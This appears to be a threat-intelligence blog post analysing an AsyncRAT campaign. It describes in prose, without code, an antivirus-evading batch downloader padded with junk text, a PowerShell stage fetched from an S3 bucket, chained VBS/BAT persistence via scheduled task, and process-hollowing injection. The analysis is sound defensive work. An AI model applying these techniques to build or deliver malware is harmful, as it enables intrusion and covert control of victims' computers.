Summary
AsyncRAT is an open-source remote administration tool released on GitHub in January 2019. It’s designed to remotely control computers via encrypted connection, providing complete control via functionalities such as:
- View and record screen
- Keylogger
- Upload, download and execute files
- Chat communication
- Persistence mechanisms
- Disable Windows Defender
- Shutdown / Restart the machine
- DOS attack
Although the official GitHub repository contains a legal disclaimer, AsyncRAT is popularly used by attackers and even some APT groups. Netskope Threat Labs recently came across a FUD (Fully Undetected) Batch script which is downloading AsyncRAT from an Amazon S3 Bucket. At the time of our analysis, the Batch script wasn’t being detected by any of the antivirus engines on VirusTotal. The attacker used some simple techniques to make the script fly under the radar, as we will describe later in this analysis.
The downloaded file (second stage) is a PowerShell script that creates and uses multiple files to execute AsyncRAT, which is injected into a legitimate process.
In this blog post, we will analyze the complete infection flow of AsyncRAT, from the FUD BAT downloader spotted by the MalwareHunterTeam to the last payload.
Stage 01 – FUD Downloader
The first stage is a batch script that contains zero detections on VirusTotal.
Although no AV vendor is detecting the file, it contains many detections via Sigma and IDS rules, as well as by sandboxes used by VirusTotal.
The file not being detected is likely due to a long string added in the file multiple times (more than 100) by the attacker.
The string is always the same and is in Japanese. Doing a rough translation, this string seems to be nonsense words added by the attacker.
The malicious command is quite simple and it can be found within the nonsense strings. It’s slightly obfuscated, which probably contributes to the absence of detection.
The command downloads and executes the second stage via PowerShell from an Amazon S3 bucket.
Stage 02 – PowerShell
The file downloaded from the Amazon S3 bucket is a PowerShell script. As we demonstrated in the diagram in the summary section, this script creates multiple files to execute the last stage.
First, it creates a folder named “Not” in “C:\ProgramData”.
Then, it creates five files in this directory. The primary goal of this stage is to run another PowerShell script in a chained execution, described below:
- File “xx.vbs” is executed by the second stage;
- File “xx.vbs” executes file “xx.bat”;
- File “xx.bat” executes file “Bin.vbs” via scheduled task;
- File “Bin.vbs” executes file “Bin.bat”;
- And finally, “Bin.bat” executes “Bin.ps1” via PowerShell.
There are two PE files within the last PowerShell script.
The first file is known as “RunPE” and it’s used to inject AsyncRAT into a legitimate process, which is the second PE file in the script.
The PowerShell script loads RunPE directly into memory, so none of the PE files are written into disk.
Stage 03 – RunPE
This file is responsible for injecting AsyncRAT into another process using Process Hollowing. It’s developed in .NET and protected with Confuser.
The PowerShell script in the second stage loads RunPE in memory and calls a method named “Execute” from “GIT.local”. The method receives the path of the targeted executable (“C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe”) and the AsyncRAT bytes in the arguments.
After removing part of the obfuscation, we can confirm that AsyncRAT is being injected via Process Hollowing.